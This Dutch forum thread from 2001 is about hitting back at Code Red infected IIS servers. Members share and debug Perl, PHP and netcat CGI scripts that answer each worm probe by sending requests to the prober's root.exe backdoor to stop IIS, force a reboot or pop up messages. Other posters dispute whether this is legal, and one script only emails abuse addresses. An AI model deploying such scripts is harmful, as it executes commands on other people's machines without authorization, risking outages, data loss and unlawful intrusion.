Those who do not understand Unix are condemned to reinvent it, poorly.
Wel ff waarschuwen volgende keer dat ie eerst probeert je pc te 'attacken' aangezien het je pc reboot indien het infected is met dat red alert virusOp zaterdag 11 augustus 2001 17:49 schreef Aaargh! het volgende:
Script
ff in op je PC installeren, het disabled IIS op de aanvallende PC en reset hem daarna.
***
If you were a Code Red infected IIS then the command just sent to port 80 was to stop iis and to reboot your machine. If you aren't infected, then you have nothing to worry about, otherwise.. you should really use a secure webserver don't you think?.. one that doesn't let people in a gaping back door to do stuff like this...)
****
(niet dat het bij mij gebeurde... maar het zal je maar overkomen)
nee, hij reset alleen maar als er een attack plaatsvindOp zaterdag 11 augustus 2001 17:56 schreef thoth het volgende:
[..]
Wel ff waarschuwen volgende keer dat ie eerst probeert je pc te 'attacken' aangezien het je pc reboot indien het infected is met dat red alert virus
1
| if (length ($ENV{QUERY_STRING}) > 0) { |
dus alleen een machine die is EN mij aanvalt besmet word gereset (en iis word uitgezet).
de worm is na de reset foetsie => weer een besmetting minder.
de attack triggered dus de reset.
Those who do not understand Unix are condemned to reinvent it, poorly.
alleen moet je dan wel de IIS patch draaien anders wordt je gewoon weer geinvecteerd... ik weet niet of dat ook op jou paginaatje staat?Op zaterdag 11 augustus 2001 18:32 schreef Aaargh! het volgende:
[..]
nee, hij reset alleen maar als er een attack plaatsvind
code:
1if (length ($ENV{QUERY_STRING}) > 0) {
dus alleen een machine die is EN mij aanvalt besmet word gereset (en iis word uitgezet).
de worm is na de reset foetsie => weer een besmetting minder.
de attack triggered dus de reset.
Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/
ik weet niks van IIS, ik heb 't script ook maar van slashdot. maar hij voert wel een commando uit om IIS uit te zetten.Op zaterdag 11 augustus 2001 18:35 schreef Tampie2000 het volgende:
[..]
alleen moet je dan wel de IIS patch draaien anders wordt je gewoon weer geinvecteerd... ik weet niet of dat ook op jou paginaatje staat?
1
| my $iis_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop"); |
of IIS na de reboot terug is zou ik niet weten.
Those who do not understand Unix are condemned to reinvent it, poorly.
1
| Addhandler cgi-script .ida |
in /etc/apache/srm.conf stond dat mijn documentroot /var/www was, dus daar heb ik die tekst in een bestandje genaamd default.ida gezet.
das toch genoeg?
Nou hopen dat er vissen bijten
hmmz..ik krijg:
1
| You don't have permission to access /default.ida on this server |
terwijl het bestand /var/www/default.ida de volgende rechten heeft:
1
| 4.0k -rw-r--r-- 1 root root 3.6k Aug 11 18:51 default.ida |
Zou dat aan een VirtualHost kunnen liggen? Ik heb van het ipadres zelf ook een virtualhost gemaakt. Moet ik die laten verwijzen naar dezelfde dir als de DocumentRoot directive? (ik weet niet waar Code Red naar kijkt, ipadressen of hostnames)
ach...in een volgend leven lach je er om!
Check je error_log bestand, waarschijnlijk moet je ExecCGI aanzetten voor /var/www.Op zaterdag 11 augustus 2001 18:56 schreef 0siris het volgende:
ik ben er net ff mee bezig geweest: het enige wat ik eigenlijk heb gedaan om .ida als cgi te behandelen is een regel in /etc/apache/srm.conf op te nemen met daarin:
code:
1 Addhandler cgi-script .ida
in /etc/apache/httpd.conf stond dat mijn documentroot /var/www was, dus daar heb ik die tekst in een bestandje genaamd default.ida gezet.
das toch genoeg?
Nou hopen dat er vissen bijten
hmmz..ik krijg:
code:
1 You don't have permission to access /default.ida on this server
terwijl het bestand /var/www/default.ida de volgende rechten heeft:
code:
1 4.0k -rw-r--r-- 1 root root 3.6k Aug 11 18:51 default.ida
Op zaterdag 11 augustus 2001 19:07 schreef Grum_ het volgende:
dit is niet legaal he ...
ach...in een volgend leven lach je er om!
verbazingwekkend genoeg krijg ik dit te zien:Check je error_log bestand, waarschijnlijk moet je ExecCGI aanzetten voor /var/www.
1
2
3
| [Sat Aug 11 19:13:26 2001] [crit] [client 62.censuur] (13)Permission denied: /home/osiris/public_html/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable |
en dat terwijl ik een virtualhost heb die dit doet met het ipadres zelf:
1
2
3
4
| <VirtualHost 212.censuur>
DocumentRoot /home[b]/gertjan/[/b]public_html
ServerName 212.censuur
</VirtualHost> |
en als ik die default.ida vanaf de prompt uitvoer, krijg ik een error:
1
2
3
4
5
6
| ./default.ida Can't locate LWP/UserAgent.pm in @INC (@INC contains: /usr/lib/perl5/5.005/i386-linux /usr/lib/perl5/5.005 /usr/local/lib/site_perl/i386-linux /usr/local/lib/site_perl /usr/lib/perl5 .) at ./default.ida line 30. BEGIN failed--compilation aborted at ./default.ida line 30. |
ach...in een volgend leven lach je er om!
hahaOp zaterdag 11 augustus 2001 19:19 schreef Grum_ het volgende:
het is niet legaal om om watvoor reden dingen op een remote pc te doen en em dan ook nog te resetten
ze komen toch zelf op die site?
en ze hebben toch zelf IIS niet gepatched?
dus ik het ook de gebruikers' schuld!
Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/
Nee? is het dan legaal om hack attempts op mijn server los te laten?Op zaterdag 11 augustus 2001 19:07 schreef Grum_ het volgende:
dit is niet legaal he ...
heb er 593 gehad.
moet ik nu 593 mensen aanklagen ofzo
Dit script zal de versprijding en instandhouding van code red sterk verminderen. Iets waar iedereen bij gebaad is.
PV Output - Obdam; SolarEdge SE5K 'Voor korte strings'; 12x350Wp Oost-West 13°; 8x415Wp Zuid 10°; Totaal 7520Wp.
reken maar dat dit zal gebeuren
hoezo ?Op zaterdag 11 augustus 2001 19:24 schreef Grum_ het volgende:
ik ga heel hard lachen als een groot bedrijf schade gaat claimen omdat hun servers zijn gereset en dus vitale informatie verloren is gegaan/transacties zijn misgegaan
reken maar dat dit zal gebeuren
ik mag whatever programma op mijn PC installeren, ik doe er verder niks mee , ZIJ starten het programma op, en dat terwijl ZIJ illegaal bezig zijn (hackpoging op mijn systeem)
Those who do not understand Unix are condemned to reinvent it, poorly.
en wat er op dat moment terug gebeurt is niet hetzelfde ?
tuurlijk is hun admin schuldig aan het niet installeren van de juiste updates maar jij bent als beheerder van de pc die de infected pc reset toch echt wel wat meer schuldig omdat JIJ zelf de software hebt geinstalleerd
dit heet het recht in eigen hand nemen en dat mag volgens geen 1 wet
het excuus van 'ja ik installeer gewoon een programma' valt dus ook weg omdat je het installeerd en DUS ben je verantwoordelijk
als iemand je auto steelt en iemand er mee plat rijdt is de eigenaar toch ook niet schuldig ? en hoeft de auto toch ook niet onklaar gemaakt te worden en als dat wel gebeurt kan de eigenaar degene die de auto onklaar heeft gemaakt aanklagen ... same story here
En als code red nu zou proberen andere websites neer te halen? of als ik nou blijf volhouden dat het zomaar op mijn server terechtkwam? dat is namelijk wel het geval met code red zelf!Op zaterdag 11 augustus 2001 19:34 schreef Grum_ het volgende:
tuurlijk is hun admin schuldig aan het niet installeren van de juiste updates maar jij bent als beheerder van de pc die de infected pc reset toch echt wel wat meer schuldig omdat JIJ zelf de software hebt geinstalleerd
ach...in een volgend leven lach je er om!
hmmz...ik ben er niet met alleen "Options ExecCGI" in httpd.conf . Maar hoe moet dat wel? kan ik dat per virtual opgeven ofzo? of met via <directory> ofzo? Ik zal wel weer te moeilijk denkenOp zaterdag 11 augustus 2001 19:04 schreef RickJansen het volgende:
Check je error_log bestand, waarschijnlijk moet je ExecCGI aanzetten voor /var/www.
1
2
3
| [Sat Aug 11 19:43:34 2001] [error] [client censuur] Options ExecCGI is off in this directory: /home/osiris/public_html/default.ida |
ach...in een volgend leven lach je er om!
jaOp zaterdag 11 augustus 2001 19:51 schreef Grum_ het volgende:
goed lezen ... als admin ben je schuldig aan het niet updaten (wat geen misdaad is) maar als jij een programma installed dat een andere pc onderuit haalt ben JIJ strafbaar
maar niet voor de volle honderd procent want het is gewoon de taak van een goede admin om die patches te installeren.
Dus, mocht er hier een rechtzaak van ontstaan dan heb je erg veel kans dat de rechter gewoon zegt; tja... dan had de admin maar voorzorgsmaatregelen moeten treffen.
(een goedgeinformeerde rechter dan he?
Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/
OK. Best. Maar wie helpt ff configgen? (zie andere posts in dit topic van mij)goed lezen ... als admin ben je schuldig aan het niet updaten (wat geen misdaad is) maar als jij een programma installed dat een andere pc onderuit haalt ben JIJ strafbaar
ach...in een volgend leven lach je er om!
Verwijderd
Hij zet eerst IIS uit, (new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop"); )
En probeert daarna de server te resetten: (new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5"); )
Maar als in de eerste stap IIS al is afgesloten, hoe komt die tweede request dan op de machine aan???
(enige wat ik kan bedenken is dat het zo snel achter elkaar gebeurt dat IIS nog niet is afgesloten.)
Verwijderd
Dit is een Perl error. Hij kan de module LWP::UserAgent niet vinden. Ik zal ff een lijstje maken met de modules die je nodig hebt en waar je ze kunt downloaden.Op zaterdag 11 augustus 2001 19:17 schreef 0siris het volgende:
[/code]
en als ik die default.ida vanaf de prompt uitvoer, krijg ik een error:
code:
1 2 3 4 5 6 ./default.ida Can't locate LWP/UserAgent.pm in @INC (@INC contains: /usr/lib/perl5/5.005/i386-linux /usr/lib/perl5/5.005 /usr/local/lib/site_perl/i386-linux /usr/local/lib/site_perl /usr/lib/perl5 .) at ./default.ida line 30. BEGIN failed--compilation aborted at ./default.ida line 30.
De modules die je nodig hebt zijn:
* http://www.cpan.org/modules/by-module/WWW/libwww-perl-5.53.tar.gz
Dit is libwww, waarin LWP::UserAgent zit.
* http://www.cpan.org/modules/by-module/URI/URI-1.15.tar.gz
Dit is URI, deze heb je nodig om libwww te gebruiken.
* http://www.cpan.org/modules/by-module/MIME/MIME-Base64-2.12.tar.gz
Deze schijn je ook nodig te hebben voor LWP::UserAgent.
* http://www.cpan.org/modules/by-module/HTML/HTML-Parser-3.25.tar.gz
En deze heb je ook nodig.
* http://www.cpan.org/modules/by-module/Net/libnet-1.0703.tar.gz
En deze ook.
* http://www.cpan.org/modules/by-module/Digest/Digest-Perl-MD5-1.5.tar.gz
En uiteindelijk deze...
Je kan ze allemaal compileren d.m.v. een "perl Makefile.pl ; make ; make test ; make install" te geven.
Compileer ze in deze volgorde:
URI
MIME-Base64
HTML-Parser
LibNet
Digest-MD5
Libwww
Op zich maakt de volgorde niet zoveel uit, behalve dat "libwww" als laatste moet.
Nu zou hij het moeten doen.
NEways: Osiris, domme vraag, maar heb je apache gerestart na config veranderen
Those who do not understand Unix are condemned to reinvent it, poorly.
NEways: Osiris, domme vraag, maar heb je apache gerestart na config veranderen
[/quote]
jazekers! apachectl restart werkt uitstekend. Alleen dat ding nog niet. Ik moet wel veel perl dingen downloaden om dat werkend te krijgen zeg! pffff....
ach...in een volgend leven lach je er om!
Op zaterdag 11 augustus 2001 21:13 schreef Grum_ het volgende:
nogmaals ... bedrijven zullen 100% zeker de rechtzaak winnen mochten ze die starten ... dus weet wat je doet
uit de ondertitel van Grum_:
ZEIKMODE = ON;
en als je wilt zorgen dat anderen de source kunnen downen moet je default.txt in je www root plaatsen of heb ik het mis
bij mij werkt het nu als ik "perl default.ida" intik maar niet als ik met een browser er naartoe ga..
(heb die regel toegevoegd in srm.conf)
Eeuwige n00b
Verwijderd
*grin*Op zaterdag 11 augustus 2001 21:04 schreef 0siris het volgende:
[..]
Sjeez...bedankt voor het opzoeken, maar dit gaat me wel ver voor een beetje vertier
NP, ik moest ze voor mijn eigen server ook opzoeken
Dus die lijst met links had ik al.
Verwijderd
Dit probleem had ik ook. Ik heb het opgelost om mijn httpd.conf te veranderen :Op zaterdag 11 augustus 2001 21:17 schreef fazer het volgende:
<knip>
bij mij werkt het nu als ik "perl default.ida" intik maar niet als ik met een browser er naartoe ga..
(heb die regel toegevoegd in srm.conf)
* Zoek naar <Directory "/var/lib/apache/htdocs">
(/var/lib/apache/htdocs/ kan bij jou (of iemand anders) anders zijn dan dit voorbeeld)
* Daar moet je Achter de (globale) optie "Options" , +ExecCGI zetten.
Dus dan komt het er zo uit te zien:
Options Indexes FollowSymLinks +ExecCGI
* Voeg ergens een nieuwe regel met:
AddHandler cgi-script .ida
(persoonlijk heb ik het onder "AddHandler cgi-script .cgi" neergezet
* Restart Apache met "apachectl" of op een andere manier.
* als het goed is moet het werken. Zoniet, doe eens een "chmod 755 default.ida"
Dit heb ik persoonlijk moeten veranderen, ik weet niet hoe het met andere distributies zit (ik gebruik Slackware 7.1)
als ik "perld default.ida" doe krijg ik dit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| #perl default.ida
Content-Type: text/html
<p>
<h1>WELCOME NTK READERS!</h1>
</p>
<p>
<H2>If you are reading this page, then you are probably curious... </H2>
</p>
<p>
This page is actually a script that will connect to your machine and
try to shut it down. Since you are seeing this you probably aren't a
Code Red infected box.
</p>
<knip> |
Maar met mijn browser werkt het nog steeds niet..
en dat terwijl ik in httpd.conf dit heb staan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| <Directory "/usr/home/www/data">
#
# This may also be "None", "All", or any combination of "Indexes",
# "Includes", "FollowSymLinks", "ExecCGI", or "MultiViews".
#
# Note that "MultiViews" must be named *explicitly* --- "Options All"
# doesn't give it to you.
#
Options Indexes FollowSymLinks MultiViews +ExecCGI
#
# This controls which options the .htaccess files in directories can
# override. Can also be "All", or any combination of "Options", "FileInfo",
# "AuthConfig", and "Limit"
#
AllowOverride All
#
# Controls who can get stuff from this server.
#
Order allow,deny
Allow from all
</Directory> |
en dit:
1
2
3
4
5
6
7
8
9
10
11
12
| #
# AddHandler allows you to map certain file extensions to "handlers",
# actions unrelated to filetype. These can be either built into the server
# or added with the Action command (see below)
#
# If you want to use server side includes, or CGI outside
# ScriptAliased directories, uncomment the following lines.
#
# To use CGI scripts:
#
AddHandler cgi-script .cgi
AddHandler cgi-script .ida |
En toch werkt het niet
Eeuwige n00b
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| <? echo "<h2>Shutting down of IIS/WIN2K systems infected with CODE RED</h2> <br /><br />this is yet another proof that the windows os sucks ass, so install linux! <br /><br />if your system is not infected this page will do no harm to your system. <br /><br />This script also notify's the owner his pc has been infected before it reboots."; if (getenv(HTTP_X_FORWARDED_FOR)){ $ip = getenv(HTTP_X_FORWARDED_FOR); } else { $ip = getenv(REMOTE_ADDR); } @file('http://'.$ip.'/scripts/root.exe?%2Fc+net+send+%25computername%25+This+machine+has+the+CODE+RED+II+worm%2C+please+shut+down+immediately+and+then+take+appropriate+measures%21%20See%20http%3A%2F%2Fvil.mcafee.com%2FdispVirus.asp%3Fvirus_k%3D99177%26'); @file('http://'.$ip.'/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5'); @file('http://'.$ip.'/scripts/root.exe?/c+iisreset+/stop') or die("<br /><br /><b>You are not infected by code red</b>"); ?> |
dit zou moeten werken denk ik ... als iemand hier die geinfecteerd is ff naar http://bserver.dhs.org:4000/default.ida zou willen surfen
If it ain't broken it doesn't have enough features
Verwijderd
Krijg je een error in error_log of je browser?Op zaterdag 11 augustus 2001 21:53 schreef fazer het volgende:
Vreemd....
enz, enz...
Zoja: Wat zegt die error?
Zoniet: Staan je permissies goed? (van default.ida)
EDIT:
Ik zie net in mijn eigen httpd.conf dat ik ook nog een regel met "AddType text/html .ida" heb toegevoegd. Probeer dat eens?
1
2
| [Sat Aug 11 22:40:05 2001] [error] (8)Exec format error: exec of /usr/home/www/data/default.ida [Sat Aug 11 22:40:05 2001] [error] [client xxx.xxx.xxx.xxx] Premature end of script headers: /usr/home/www/data/default.ida |
als dat zo is vind ik het vreemd dat ie het wel doet als ik "perl default.ida" in tik..
Eeuwige n00b
1
2
3
4
5
| #!/bin/sh echo "Content-type: text/html" echo echo `date` - $REMOTE_ADDR | sed s/::ffff:// | sed s/CEST\ 2001\ // >>codered.log /bin/cat /usr/local/www/data/GET /usr/local/bin/nc -w 60 `echo $REMOTE_ADDR | sed s/::ffff://` 80 |
Edit: in de GET file staat gewoon iets als GET /scripts/root.exe?/c+watdanook HTTP/1.0
[enter]
[enter]
Hmjaja, maar dat kan veel makkelijkerOp zaterdag 11 augustus 2001 20:03 schreef Anthraxx het volgende:
[..]
Je kan ze allemaal compileren d.m.v. een "perl Makefile.pl ; make ; make test ; make install" te geven.
Compileer ze in deze volgorde:
URI
MIME-Base64
HTML-Parser
LibNet
Digest-MD5
Libwww
Op zich maakt de volgorde niet zoveel uit, behalve dat "libwww" als laatste moet.
Nu zou hij het moeten doen.
perl -MCPAN -e 'install URI'
perl -MCPAN -e 'install MIME-Base64'
perl -MCPAN -e 'install HTML-Parser'
perl -MCPAN -e 'install LibNet'
perl -MPCAN -e 'install Digest-MD5'
perl -MCPAN -e 'install Libwww'
Hoef je ook niks te downloaden enzo..
Verwijderd
Gaaf! Die wist ik nog nietOp zondag 12 augustus 2001 00:49 schreef RickJansen het volgende:
[..]
Hmjaja, maar dat kan veel makkelijker
perl -MCPAN -e 'install URI'
perl -MCPAN -e 'install MIME-Base64'
perl -MCPAN -e 'install HTML-Parser'
perl -MCPAN -e 'install LibNet'
perl -MPCAN -e 'install Digest-MD5'
perl -MCPAN -e 'install Libwww'
Hoef je ook niks te downloaden enzo..
En Fazer:
Staat in je default.ida je path naar perl wel goed? Dus edit default.ida en op de 1ste regel moet zoiets staan als "#!/usr/bin/perl -w" verander dat (als het nodig is) naar de goede directry waarin perl staat.
Misschien dat het daaraan zou kunnen liggen.
Veel mensen draaien IIS zonder dat ze het weten. Het zal hun dan ook een worst zijn als die uitgeschakeld wordt. Denk eerder dat ze er blij mee zijn omdat het hun 95% CPU belasting scheelt.
Veel mensen draaien en gebruiken een slechte IIS. Als ze er dan achter komen dat hun server ineens down is, zullen ze wel ff achter de oren krabben waarom dat zo is.
Er zijn nog genoeg servers die besmet zijn met de eerste variant van Code red, dus je kunt kiezen: of defaced zijn, of gewoon helemaal nix...
En denk maar niet dat er zoveel amerikaantjes zijn die het gedaan krijgen om ons aan te klagen. Mogen ze eerst naar de ISP om onze gegevens...
Voor zover ik weet zet ie de service van IIS op disabled. Vervolgens start ie je systeem opnieuw en wordt IIS niet meer geladen.Op zaterdag 11 augustus 2001 20:00 schreef Operations het volgende:
Ik vat één ding niet in dat script...
Hij zet eerst IIS uit, (new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop"); )
En probeert daarna de server te resetten: (new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5"); )
Maar als in de eerste stap IIS al is afgesloten, hoe komt die tweede request dan op de machine aan???
(enige wat ik kan bedenken is dat het zo snel achter elkaar gebeurt dat IIS nog niet is afgesloten.)
fout 1Op zondag 12 augustus 2001 12:14 schreef _JGC_ het volgende:
Dit is 100% legaal (vind ik):
een rechter zal daar maling aan hebben
uhm ... IIS niet draait zonder dat je het weet ? zover ik weet moet je het toch echt zelf aanzettenVeel mensen draaien IIS zonder dat ze het weten. Het zal hun dan ook een worst zijn als die uitgeschakeld wordt. Denk eerder dat ze er blij mee zijn omdat het hun 95% CPU belasting scheelt.
en als ze gegevens kwijt zijn of gedupeerd krabben ze achter de oren van hun advocatenVeel mensen draaien en gebruiken een slechte IIS. Als ze er dan achter komen dat hun server ineens down is, zullen ze wel ff achter de oren krabben waarom dat zo is.
of gewoon goede producten uitbrengen OF netjes updaten (het is handig als mensen onder hun steen vandaan komen)Er zijn nog genoeg servers die besmet zijn met de eerste variant van Code red, dus je kunt kiezen: of defaced zijn, of gewoon helemaal nix...
en je denkt dat die niet worden vrij gegeven ? grapjas ... dat word bij misbruik ALTIJD gedaanEn denk maar niet dat er zoveel amerikaantjes zijn die het gedaan krijgen om ons aan te klagen. Mogen ze eerst naar de ISP om onze gegevens...
ik ga hard lachen als er iemand dood word gesued ...
het is echt [b]NIET[/b] legaal so be warned
Dit is legaal. Het is geen inbraak, want die is al gebeurd.ik ga heel hard lachen als een groot bedrijf schade gaat claimen omdat hun servers zijn gereset en dus vitale informatie verloren is gegaan/transacties zijn misgegaan
De 'vitale' informatie gaat zeker verloren als Code Red 2 komt kijken, en aangezien bedrijven erg huiverig zijn om hun reputatie te verliezen zal het met die claims wel mee gaan vallen.
Waar baseer jij die wijsheid op als ik vragen mag ? Er is geen sprake van moedwillig toegang verschaffen, want dat is al gebeurd.nogmaals ... bedrijven zullen 100% zeker de rechtzaak winnen mochten ze die starten ... dus weet wat je doet
Dus als iemand anders de plaatselijke juwelier ramkraakt is het ok als ik daarna ff meegraai in de etalage?Op zondag 12 augustus 2001 16:59 schreef igmar het volgende:
[..]
Waar baseer jij die wijsheid op als ik vragen mag ? Er is geen sprake van moedwillig toegang verschaffen, want dat is al gebeurd.
BS.
Ook met alle goede bedoelingen ter wereld blijft het illegaal om jezelf toegang te verschaffen tot andere systemen.
Ik denk persoonlijk ook dat het wel mee zal vallen met rechtzaken, maar dat dacht Dave McOwen ook, en die kijkt nu tegen 30 jaar cel en iets van fl. 300.000,- boete aan.
Straks niet gaan janken als jouw scriptje _perongeluk_ de webserver van de staat Georgia uitzet, en je (al is het maar 1 tiende deel van) Dave z'n straf krijgt.
Whenever you find that you are on the side of the majority, it is time to reform.
Antivirus maatschappijen krijgen toch ook geen rechtzaak omdat er een optie "When infected: Delete without questions" in hun antivirus software zit?
Jezelf als systeembeheerder voordoen en dan nooit kijken of er ook bugs zijn vind ik net zo debiel als bovenstaande optie in je virusscanner aanzetten.
verder zit ik op het sjello netwerk, en 75% van alle code red aanvallen komen vanuit het chello netwerk hier, lijkt me dus allemaal debiele thuisgebruikers die niet eens weten dat ze IIS hebben draaien.
O ja, je kunt ook de rechtszaak omdraaien:
Zij proberen op jou server in te breken, dit zorgt ervoor dat dat script gaat draaien, kost CPU power + hdd access, dus kost mij dat resources. Kan ik hun toch ook aanklagen? Ik kan nog altijd zeggen dat ik niet wist dat dit script op mijn server draaide en dat het best wel eens een virus ofzow kon zijn
Welk gedeelte van "ongeoorloofde toegang" begrijp je niet? Inbreken bij de juwelier en niets meenemen is _ook_ strafbaar. Voor computers geldt hetzelfde.Op zondag 12 augustus 2001 17:46 schreef _JGC_ het volgende:
Dit script zet code red inclusief IIS uit. het sloopt dus helemaal nix. een goede admin installeert de patch en start daarna de service weer. Je sloopt toch niets? Je zorgt er alleen voor dat het virus zich niet verder verspreidt.
Nee, en M$ wordt ook niet aangeklaagd omdat ze format.exe meeleveren met windows. Lees de gebruikersovereenkomst van elk willekeurig softwarepakket nog eens door.Antivirus maatschappijen krijgen toch ook geen rechtzaak omdat er een optie "When infected: Delete without questions" in hun antivirus software zit?
Jezelf als systeembeheerder voordoen en dan nooit kijken of er ook bugs zijn vind ik net zo debiel als bovenstaande optie in je virusscanner aanzetten.
Mag ik hieruit afleiden dat debielen geen rechten hebben? Als in: "De plaatselijke juwelier beroven is strafbaar, maar je debiele buurman beroven is geen probleem."verder zit ik op het sjello netwerk, en 75% van alle code red aanvallen komen vanuit het chello netwerk hier, lijkt me dus allemaal debiele thuisgebruikers die niet eens weten dat ze IIS hebben draaien.
En dan nu de enige _enigszins_ verstandige opmerking:
Een rechtszaak aanspannen (of: "de autoriteiten inschakelen", rechtszaken zijn zo amerikaans) zou inderdaad de juiste manier zijn.edit:
O ja, je kunt ook de rechtszaak omdraaien:
Zij proberen op jou server in te breken, dit zorgt ervoor dat dat script gaat draaien, kost CPU power + hdd access, dus kost mij dat resources. Kan ik hun toch ook aanklagen? Ik kan nog altijd zeggen dat ik niet wist dat dit script op mijn server draaide en dat het best wel eens een virus ofzow kon zijn. Dat is nml hun verweer dan ook.
In de meeste beschaafde landen is eigenrichting (en dat is dit anti-CR-script) verboden. Net zomin als je de kinderverkrachter z'n ballen eraf mag snijden (hoe graag je dat ook zou willen) zodat ie het nooit meer doet, mag je ook niet iemands webserver aanpassen zodat ie je niet meer lastig valt.
Zo.
Terzijde: ik vind dat anti-CR-script een prima idee, en ik denk ook dat het met eventuele aanklachten wel mee zal vallen. Ik vind het alleen nogal raar dat sommige mensen hier zich in allerlei bochten wringen om het 'legaal' te krijgen. Dat is het niet. Strafbaar wel.
Whenever you find that you are on the side of the majority, it is time to reform.
Kan je altijd nog zeggen: "Ik heb goed gedaan, want ik heb het aantal servers wat strax whitehouse.gov aanvalt flink gereduceerd"
Denk dat een beetje amerikaanse rechter die ook maar enig verstand heeft dan de boel zou afblazen...
Of: Ik had dat script al draaien voordat zij binnenkwamen... Alarm gaat af, server in de boeien
Maar legaal is het niet nee. Effectief wel
denk dat ik dan maar geen script erin zet..
Eeuwige n00b
Verwijderd
/scripts/c+IIsreset+/reboot
dan gaat de machine op zijn bek:-)
en bij
http://192.168.0.39/scripts/root.exe?/c+net+send+192.168.0.39+yo
u+are+infected+by+code+red+anyone+can+download+your+data+a
sshole!!
krijg je een berichtv op je scherm. Als je %computernaam% gebruikt vult hij die van jou in, wanneer je dit direct doet.
Nu ga ik eens mijzelf aanklagen:-)
hc
Hoezo,
"maar als ik aangeklaagd wordt dan heb ik verweer blablabla...",
"dan klaag ik hen toch aan...",
"een rechter met verstand van zaken..."?
1. jouw verweer zal vrij weinig uitmaken als je tegenover een groepje duurbetaalde advocaten van een bedrijf staat. Zeker als het een "ja maar, zij zijn begonnen" verweer is.
2. een rechtzaak beginnen? en wie gaat dat betalen? en bij wie denk je dat de geldbuidel het eerste op is?
3. *LOL*
Nogmaals, het zal wel niet zo ver komen, maar sprookjes verzinnen laat je maar aan de gebroeders Grim over
Today's subliminal thought is:
Verwijderd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| #!/bin/sh # pad van dir met code-red gegevens, deze moet je ff aanmaken P=/var/cgi-bin/codered echo "Content-type: text/plain" echo cat $P/mail.txt if [ -z $REMOTE_ADDR ]; then echo "`date` unknown" >> $P/people/r.txt exit fi if [ -n "`cat $P/people/r.txt | grep $REMOTE_ADDR`" ]; then echo "`date` $REMOTE_ADDR host mailed before" >> $P/people/r.txt exit fi echo "`date` $REMOTE_ADDR sending mail" >> $P/people/r.txt # even opgeven vanaf wie het mailtje komt EF="wouter@hushmail.com" # naar wie het mailtje moet ET="abuse@$REMOTE_ADDR,root@$REMOTE_ADDR,administrator@$REMOTE_ADDR" # onderwerp ES="Warning: your computer might be infected with a Code Red virus" #inhoud van mailtje EB=`cat $P/mail.txt` echo -e "From:$EF\nTo:$ET\nSubject:$ES\n$EB\n.\n"|sendmail $ET 2>&1 >> $P/people/maillog.txt echo -e "\n" >> $P/people/$REMOTE_ADDR.txt echo "+-----------------------------------------------------------------" >> $P/people/$REMOTE_ADDR.txt echo "| Possible Code-Red infected computer" >> $P/people/$REMOTE_ADDR.txt echo "| hostname : $REMOTE_ADDR" >> $P/people/$REMOTE_ADDR.txt echo "| local date: `date`" >> $P/people/$REMOTE_ADDR.txt echo "" >> $P/people/$REMOTE_ADDR.txt echo -e "GET / HTTP/1.0\n" | nc $REMOTE_ADDR 80 2>&1 >> $P/people/$REMOTE_ADDR.txt |
als het goed is stuurt dit scrip een mailtje naar:
abuse@
root@
administrator@
van de desbetreffende host.
Het vraagt ook / op van de desbetreffende server (om te kijken of hij eigenlijk wel ISS runt, ofdat hij je opzettelijk probeert aan te vallen. Dit kun je weghalen door het stuk vanaf "echo -e "\n" >> $P/people/$REMOTE_ADDR.txt" te verwijderen.
Je moet een directory maken met gegevens, en even P= opgeven. Deze directory moet 755 rwxr-xr-x hebben. In deze directory moet je een bestand mail.txt maken deze moet rw-r--r-- hebben.. Dit is het mailtje dat verstuurt zal worden. Je moet ook een directory "people" maken. Deze moet rwxrwxrwx hebben. Hierin komen de logs.
dus:
directory rwxr-xr-x (opgegeven met P=)
__mail.txt rw-r--r--
__people (directory) rwxrwxrwx
Verder moet je de volgende dingen opgeven:
__EF="wouter@hushmail.com"
__ES="Warning: your computer might be infected with a Code Red virus"
Ik heb het alsvolgt laten uitvoeren door Apache:
ScriptAlias /default.ida "/var/cgi-bin/default.ida"
waarbij "/var/cgi-bin/default.ida" mijn cgi-bin directory is, en het bovenstaande bestandje default.ida in deze cgi-bin directory staat.